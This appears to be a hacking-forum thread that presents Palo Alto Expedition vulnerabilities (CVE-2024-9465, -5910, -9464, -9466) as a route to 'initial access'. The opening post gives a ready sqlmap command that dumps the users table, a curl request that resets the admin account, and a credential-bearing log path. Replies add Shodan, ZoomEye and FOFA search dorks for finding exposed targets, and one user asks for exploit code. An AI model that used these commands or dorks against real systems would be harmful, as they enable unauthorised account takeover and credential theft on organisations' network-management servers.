CVE-2024-9465 | CVE-2024-5910 | CVE-2024-9464
by Aanya - Saturday October 19, 2024 at 08:08 AM
#1
This  is a recent one good for initial access  Angel Angel

CVE-2024-9465: Palo Alto Expedition Unauthenticated SQL Injection :
Firing up the SQLMAP tool, and supplying it the endpoint and parameter to inject and table to dump, it successfully dumps the entire users table:
python3 sqlmap.py -u "https://10.0.0.0/bin/configurations/parsers/Checkpoint/CHECKPOINT.php?action=im port&type=test&project=pandbRBAC&signatureid=1" -p signatureid -T users --dump


CVE-2024-5910: Expedition: Missing Authentication Leads to Admin Account Takeover for attackers with network access : 
curl -k 'https://10.0.40.64/0S/startup/restore/restoreAdmin.php'


CVE-2024-9464: Palo Alto Expedition Authenticated Command Injection Exploit :
CVE-2024-9466: Cleartext Credentials in Logs
/home/userSpace/devices/debug.txt
This world-readable file contained the raw request logs of the Expedition server when it exchanged cleartext credentials for API keys in the device integration process. The Expedition server only stores the API keys, and is not supposed to retain the cleartext credentials, but this log file showed all the credentials used in cleartext. This issue was reported and assigned CVE-2024-9466.


Shodan Dork :
html:"Expedition Project"


with  Heart @Aanya
Reply
#2
great thread thank you aanya

for CVE-2024-9465

zoomeye.hk
title:"Expedition Project" "Expedition Project"

fofa.info
body="Expedition Project" || title="Expedition Project"

shodan.io
html:"Expedition Project"
This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: Arrested
Reply
#3
(10-19-2024, 08:09 AM)prx Wrote: great thread thank you aanya

for CVE-2024-9465

zoomeye.hk
title:"Expedition Project" "Expedition Project"

fofa.info
body="Expedition Project" || title="Expedition Project"

shodan.io
html:"Expedition Project"

nice thanks do it more
Reply
#4
i want their exploit or poc code
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  CVE-2025-40554 - SolarWinds Web Help Desk Auth Bypass & RCE PoC miyako 3 77 02-07-2026, 03:32 PM
Last Post: cysc
  POC CVE-2025-24071 caca28sapo1 15 809 02-07-2026, 08:53 AM
Last Post: hacker0123
  HPE OneView RCE Exploit [CVE-2025-37164] Hawx01 8 263 02-06-2026, 07:08 PM
Last Post: hacker0123
  CitrixBleed / CVE-2023-4966 cccp 10 6,799 02-06-2026, 01:36 AM
Last Post: temptest
  WordPress LFI to RCE - CVE-2025-0366 Serious 1 459 02-05-2026, 09:53 AM
Last Post: Sammm89



 Users browsing this thread: